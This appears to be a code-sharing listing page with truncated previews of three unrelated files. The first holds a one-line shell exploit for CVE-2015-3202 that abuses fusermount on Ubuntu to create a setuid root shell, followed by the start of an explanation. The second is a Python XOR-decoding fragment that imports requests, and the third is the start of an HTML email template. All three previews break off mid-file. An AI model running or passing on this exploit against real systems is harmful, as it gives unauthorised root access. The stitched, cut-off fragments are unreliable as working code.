This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
# Here's how it works, $a holds the name of a shellscript to be executed as | |
# root. | |
a=/tmp/.$$; | |
# $b is used twice, first to build the contents of shellscript $a, and then as |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import hashlib | |
import struct | |
import requests | |
def decode(data,seed,step): | |
r = [] | |
k = seed | |
for c in map(ord,data): | |
r.append(chr(c ^ k)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<style> | |
* { | |
font-family:Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif; | |
} | |
</style> | |
</head> | |
<body> | |
<table cellpadding="0" cellspacing="0" class="email-wrapper" style="padding-top:32px;background-color:#ffffff;"><tbody> |